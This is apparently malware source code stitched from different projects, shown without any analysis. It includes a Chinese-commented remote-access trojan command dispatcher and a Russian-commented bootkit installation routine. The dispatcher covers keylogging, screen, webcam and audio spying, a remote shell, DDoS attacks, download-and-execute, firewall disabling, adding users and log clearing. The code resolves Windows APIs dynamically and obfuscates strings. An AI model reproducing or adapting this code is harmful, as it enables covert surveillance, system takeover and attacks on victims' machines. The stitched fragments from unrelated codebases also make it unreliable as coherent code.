void ManageNewConnection( SOCKET Socket, ULONG uIP, USHORT uCid, USHORT uPort)
{
pWaitForSingleObject( hThreadMutex, INFINITE );
if ( dwConnections < MAX_CONN )
{
Connections[ dwConnections ].thread_s = INVALID_SOCKET;
Connections[ dwConnections ].s = Socket;
Connections[ dwConnections ].ip = uIP;
Connections[ dwConnections ].port = uPort;
Connections[ dwConnections ].cid = uCid;
Connections[ dwConnections ].bid = (USHORT)dwBid + 1;
in_addr in;
in.S_un.S_addr = uIP;
Connections[ dwConnections ].thread_s = NetConnect( (char*)pinet_ntoa( in ), uPort );
dwBid++;
DWORD ThreadId = 0;
dwConnections++;
Connections[ dwConnections - 1 ].hThread = pCreateThread( NULL, 0, ConnectionThread, (void*)Connections[ dwConnections - 1 ].bid, 0, &ThreadId );
}
pReleaseMutex( hThreadMutex );
}
SOCKET MyConnect( char *Host, int Port )
{
LPHOSTENT lpHost = (LPHOSTENT)pgethostbyname( (const char*)Host );
if ( lpHost == NULL )
{
return -1;
}
sockaddr_in SockAddr;
SockAddr.sin_family = AF_INET;
SockAddr.sin_addr.s_addr = **(unsigned long**)lpHost->h_addr_list;
SockAddr.sin_port = (USHORT)phtons( (unsigned short)Port );
ConnectionData connData;
connData.SockAddr = SockAddr;
for(int i=0; i<3; i++) {
SOCKET Socket = (SOCKET)psocket( AF_INET, SOCK_STREAM, 0 );
if( Socket == -1 )
return -1;
connData.Socket = Socket;
HANDLE ConnectThreadHandle = (HANDLE)pCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)ConnectThread, &connData, NULL, 0);
if((long)pWaitForSingleObject(ConnectThreadHandle, 10000) == WAIT_TIMEOUT)
{
if((int)pshutdown(Socket, 2) == SOCKET_ERROR)
{
}
pTerminateThread(ConnectThreadHandle, 1);
}
DWORD exitCode = 0;
BOOL res = (BOOL)pGetExitCodeThread(ConnectThreadHandle, &exitCode);
//wsprintfA(&str[0], "EC:%d", exitCode);
//OutputDebugStringA(&str[0]);
if(res && exitCode == 0)
return Socket;
}
return -1;
}
// 加上激活
void CKernelManager::OnReceive(LPBYTE lpBuffer, UINT nSize)
{
typedef LONG (WINAPI *InterlockedExchangeT)
(
__inout LONG volatile *Target,
__in LONG Value
);
InterlockedExchangeT pInterlockedExchange = (InterlockedExchangeT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"InterlockedExchange");
typedef VOID (WINAPI *SleepT)
(
__in DWORD dwMilliseconds
);
SleepT pSleep = (SleepT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"Sleep");
typedef HANDLE
(WINAPI
*CreateThreadT)(
__in_opt LPSECURITY_ATTRIBUTES lpThreadAttributes,
__in SIZE_T dwStackSize,
__in LPTHREAD_START_ROUTINE lpStartAddress,
__in_opt LPVOID lpParameter,
__in DWORD dwCreationFlags,
__out_opt LPDWORD lpThreadId
);
CreateThreadT pCreateThread=(CreateThreadT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"CreateThread");
typedef BOOL (WINAPI *CloseHandleT)
(
__in HANDLE hObject
);
char DDZGlGm[] = {'C','l','o','s','e','H','a','n','d','l','e','\0'};
CloseHandleT pCloseHandle = (CloseHandleT)GetProcAddress(LoadLibrary("KERNEL32.dll"),DDZGlGm);
typedef BOOL
(WINAPI
*EnumWindowsT)(
__in WNDENUMPROC lpEnumFunc,
__in LPARAM lParam);
EnumWindowsT pEnumWindows=(EnumWindowsT)GetProcAddress(LoadLibrary("USER32.dll"),"EnumWindows");
switch (lpBuffer[0])
{
case COMMAND_ACTIVED:
pInterlockedExchange((LONG *)&m_bIsActived, true);
break;
case COMMAND_LIST_DRIVE: // 文件管理
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_FileManager,
(LPVOID)m_pClient->m_Socket, 0, NULL, false);
break;
case COMMAND_SCREEN_SPY: // 屏幕查看
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_ScreenManager,
(LPVOID)m_pClient->m_Socket, 0, NULL, true);
break;
case COMMAND_WEBCAM: // 摄像头
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_VideoManager,
(LPVOID)m_pClient->m_Socket, 0, NULL);
break;
case COMMAND_AUDIO: // 声音监听
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_AudioManager,
(LPVOID)m_pClient->m_Socket, 0, NULL);
break;
case COMMAND_SHELL: // 远程sehll
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_ShellManager,
(LPVOID)m_pClient->m_Socket, 0, NULL, true);
break;
case COMMAND_KEYBOARD: //键盘记录
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_KeyboardManager,
(LPVOID)m_pClient->m_Socket, 0, NULL);
break;
case COMMAND_SYSTEM: //系统管理,包括进程,窗口
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_SystemManager,
(LPVOID)m_pClient->m_Socket, 0, NULL);
break;
case COMMAND_SERMANAGER: // 服务管理
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_SerManager,
(LPVOID)m_pClient->m_Socket, 0, NULL);
break;
case COMMAND_DDOS_ATTACK:
{
ATTACK m_Attack;
memcpy(&m_Attack,lpBuffer + 1,sizeof(ATTACK));
DDOSManager m_DDOSManager(&m_Attack);
}
break;
case COMMAND_DDOS_STOP:
Stoping = FALSE;
break;
case COMMAND_REGEDIT: //注册表管理
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_RegeditManager,
(LPVOID)m_pClient->m_Socket, 0, NULL);
break;
case COMMAND_SYSINFO:
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_SysInfoManager,
(LPVOID)m_pClient->m_Socket, 0, NULL);
break;
case COMMAND_NET_USER: // 无NET加用户
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)NETUSER,
(LPVOID)(lpBuffer + 1), 0, NULL, true);
break;
case COMMAND_OPEN_PROXY: // 开启代理
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)OpenProxy,
(LPVOID)(lpBuffer + 1), 0, NULL, true);
break;
case COMMAND_OPEN_3389:
{
Open3389((LPCTSTR)(lpBuffer + 1), nSize -2);
}
break;
case COMMAND_GUEST: // 开启GUEST账号
OpenGuest();
break;
case COMMAND_STOPFIRE: // 关防火墙
StopFire();
break;
case COMMAND_CHANGE_PORT: // 更改终端
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0,(LPTHREAD_START_ROUTINE)ChangePort, (LPVOID)(lpBuffer + 1), 0, NULL, true);
break;
case COMMAND_SENDMSG:
{
pCloseHandle(pCreateThread(NULL,NULL,Loop_MsgBox,&lpBuffer[1],NULL,NULL));
pSleep(500);
}
break;
case COMMAND_DOWN_EXEC: // 下载者
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_DownManager,
(LPVOID)(lpBuffer + 1), 0, NULL, true);
pSleep(100); // 传递参数用
break;
case COMMAND_OPEN_URL_SHOW: // 显示打开网页
OpenURL((LPCTSTR)(lpBuffer + 1), SW_SHOWNORMAL);
break;
case COMMAND_OPEN_URL_HIDE: // 隐藏打开网页
OpenURL((LPCTSTR)(lpBuffer + 1), SW_HIDE);
break;
case COMMAND_REMOVE: // 卸载,
UnInstallService();
break;
case COMMAND_CLEAN_EVENT: // 清除日志
CleanEvent();
break;
case COMMAND_SESSION://会话管理
CSystemManager::ShutdownWindows(lpBuffer[1]);
break;
case COMMAND_RENAME_REMARK: // 改备注
SetHostID((LPCTSTR)(lpBuffer + 1));
break;
case COMMAND_CHANGE_GROUP: // 改分组
SetInfo("Group", (LPCTSTR)(lpBuffer + 1), "BITS");
break;
case COMMAND_UPDATE_SERVER: // 更新服务端
if (UpdateServer((char *)lpBuffer + 1))
UnInstallService();
break;
case COMMAND_REPLAY_HEARTBEAT: // 回复心跳包
break;
case COMMAND_SORT_PROCESS: // 进程筛选
try
{
if (isProcesin((LPTSTR)(lpBuffer + 1)))
{
BYTE bToken = TOKEN_INFO_YES;
m_pClient->Send(&bToken, 1);
}else
{
BYTE bToken = TOKEN_INFO_NO;
m_pClient->Send(&bToken, 1);
}
}catch(...){}
break;
case COMMAND_SORT_WINDOW: // 窗体筛选
try
{
strcpy(temp_proc,(LPTSTR)(lpBuffer + 1));
pEnumWindows(EnumWindowsList,0);
if (proc_tag)
{
BYTE bToken = TOKEN_INFO_YES;
m_pClient->Send(&bToken, 1);
proc_tag = false;
}else
{
BYTE bToken = TOKEN_INFO_NO;
m_pClient->Send(&bToken, 1);
}
}catch(...){}
break;
}
}
// Ф-ция, которая после проверок вызывает события старта в процессе Explorer,
// что в свою очередь вызывает установку BkDll
BOOL ExplorerMain()
{
BOOL ret = FALSE;
bool BkInstalledSuccess = false;
PP_DPRINTF(L"ExplorerMain: started");
// Вызываем событие старта експлорера
if ( (DWORD)pGetFileAttributesA(PathBkFile) == INVALID_FILE_ATTRIBUTES)
{
PP_DPRINTF(L"ExplorerMain: BkFile not exists. Runing ExplorerStart()");
if ( ExplorerStart(NULL) )
{
ret = TRUE;
BkInstalledSuccess = true;
PP_DPRINTF(L"ExplorerMain: ExplorerStart() finished successfuly. Saving 0x00000001 in '%S'",
PathBkFile);
// Записываем в BkFile 4 байта с единичкой.
File::WriteBufferA(PathBkFile,&ret,sizeof(BOOL));
}
}
else
{
PP_DPRINTF(L"ExplorerMain: BkFile exists.");
ret = TRUE;
};
if ( ret )
{
// Если проверка находит файл Bk или возвращает успех при установке -
// создается файл в системном корне с 4 байтами адреса строки.
// Этот файл проверяется ring3 ботом, который запустил дропер буткита.
// При нахождении этого файла он будет пытатся удалить себя из автозапуска.
PCHAR Path= STR::Alloc(MAX_PATH);
PCHAR UID=STR::Alloc(120);
pGetSystemDirectoryA(Path,MAX_PATH);
GenerateUid(UID);
Path[3]='\0';
PCHAR Pref= STR::GetRightStr(UID,"0");
m_lstrcat(Path, Pref);
PP_DPRINTF(L"ExplorerMain: Bk installed. Creating file '%S'", Path);
File::WriteBufferA(Path,&Path,sizeof(PCHAR));
STR::Free(Pref);
STR::Free(UID);
STR::Free(Path);
};
if (BkInstalledSuccess)
{
DWORD thid = 0;
PP_DPRINTF(L"ExplorerMain: starting reboot thread and reboot notify thread");
pCreateThread(NULL, 0, RebootThread, NULL, 0, &thid);
pCreateThread(NULL, 0, RebootNotifyThread, NULL, 0, &thid);
}
PP_DPRINTF(L"ExplorerMain: finished.");
return ret;
}